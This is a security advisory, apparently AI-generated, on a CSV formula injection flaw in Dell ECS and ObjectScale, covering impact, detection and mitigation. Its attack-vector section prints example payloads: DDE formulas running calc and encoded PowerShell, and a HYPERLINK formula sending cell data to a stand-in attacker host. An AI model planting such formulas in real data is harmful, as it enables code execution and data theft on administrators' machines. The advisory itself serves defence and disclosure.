CVE-2026-35157 Overview
CVE-2026-35157 is a CSV formula injection vulnerability affecting Dell Elastic Cloud Storage (ECS) and Dell ObjectScale. The flaw resides in the management user interface (UI), which fails to neutralize formula elements written into exported CSV files [CWE-1236]. An unauthenticated remote attacker can inject crafted payloads that execute when a privileged user opens the resulting CSV in a spreadsheet application. Successful exploitation can lead to remote code execution on the victim's workstation. Dell published advisory DSA-2026-047 covering this and related issues in ECS and ObjectScale.
Critical Impact
An unauthenticated network attacker can inject spreadsheet formulas that execute arbitrary commands when administrators open exported CSV data, compromising operator endpoints used to manage object storage clusters.
Affected Products
- Dell ECS versions 3.8.1.0 through 3.8.1.7
- Dell ObjectScale versions prior to 4.3.0.0
- Dell Elastic Cloud Storage management UI components
Discovery Timeline
- 2026-05-11 - CVE-2026-35157 published to NVD
- 2026-05-12 - Last updated in NVD database
Technical Details for CVE-2026-35157
Vulnerability Analysis
The vulnerability stems from improper neutralization of formula elements in CSV files generated by the Dell ECS and ObjectScale UI. When user-controlled data is written into exported CSV reports, the application does not sanitize leading characters such as =, +, -, @, tab, or carriage return. Spreadsheet applications including Microsoft Excel and LibreOffice Calc interpret cells beginning with these characters as formulas. Attackers can therefore plant payloads through fields exposed in the UI without authentication, and those payloads execute when an administrator downloads and opens the CSV.
Formula injection can pivot from data ingestion into command execution via spreadsheet features such as DDE, HYPERLINK, WEBSERVICE, or IMPORTXML. The attacker leverages the trust placed in internal exports to reach administrator endpoints behind perimeter controls.
Root Cause
The root cause is missing output encoding when constructing CSV rows. The CSV writer concatenates field values directly without prefixing potentially dangerous values with a safe character such as a single quote or escaping the leading metacharacter. This matches [CWE-1236: Improper Neutralization of Formula Elements in a CSV File].
Attack Vector
The attack is network-based and requires no authentication or user interaction with the ECS UI itself. The attacker submits a crafted value through any input field that later appears in a CSV export, for example a bucket name, tag, user attribute, or log entry. When an operator exports the data and opens the file, the embedded formula executes in the context of the operator's workstation. See the Dell Security Update Advisory for vendor details.
Example payload pattern (do not execute):
=cmd|'/C calc'!A1
@SUM(1+1)*cmd|'/C powershell -enc <base64>'!A1
=HYPERLINK("http://attacker.example/?d="&A1,"Click")
These values, once stored in ECS or ObjectScale and later exported, become live formulas in the resulting spreadsheet.
Detection Methods for CVE-2026-35157
Indicators of Compromise
- CSV exports from ECS or ObjectScale containing cells that begin with =, +, -, or @ followed by function names such as cmd, HYPERLINK, WEBSERVICE, or DDE.
- Spreadsheet processes (excel.exe, soffice.bin) spawning cmd.exe, powershell.exe, wscript.exe, or mshta.exe on administrator endpoints.
- Outbound HTTP or DNS requests from spreadsheet processes to unknown external hosts shortly after opening an exported report.
Detection Strategies
- Inspect ECS and ObjectScale stored fields (bucket names, tags, user metadata, log messages) for entries whose first character is a CSV formula trigger.
- Hunt endpoint telemetry for parent-child process relationships where Office or LibreOffice applications launch shells or scripting engines.
- Correlate UI export events with subsequent process execution on the operator workstation to identify weaponized exports.
Monitoring Recommendations
- Enable command-line logging and DNS query logging on workstations used to administer Dell ECS and ObjectScale.
- Alert on spreadsheet applications initiating network connections to non-corporate destinations.
- Track administrative actions in ECS and ObjectScale that produce CSV downloads, and review the exported content before distribution.
How to Mitigate CVE-2026-35157
Immediate Actions Required
- Apply the fixes referenced in Dell advisory DSA-2026-047 for ECS and ObjectScale.
- Restrict access to the ECS and ObjectScale management UI to trusted networks and authenticated administrators only.
- Instruct administrators to avoid opening CSV exports directly and to inspect file contents in a text editor first.
Patch Information
Dell addresses CVE-2026-35157 in ObjectScale 4.3.0.0 and later, and in fixed releases for ECS beyond 3.8.1.7. Refer to the Dell Security Update Advisory DSA-2026-047 for the exact remediated builds and upgrade procedures.
Workarounds
- Configure Microsoft Excel and LibreOffice Calc to disable Dynamic Data Exchange (DDE) and external content execution.
- Import exported CSV files into spreadsheets using the text import wizard with all columns set to text, preventing formula evaluation.
- Sanitize CSV exports downstream by prefixing any cell that begins with =, +, -, @, tab, or carriage return with a single quote.
# Example sanitizer for ECS/ObjectScale CSV exports
awk 'BEGIN{FS=OFS=","} {
for (i=1; i<=NF; i++) {
if ($i ~ /^[=+\-@\t\r]/) { $i = "'\''" $i }
}
print
}' export.csv > export.sanitized.csv
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
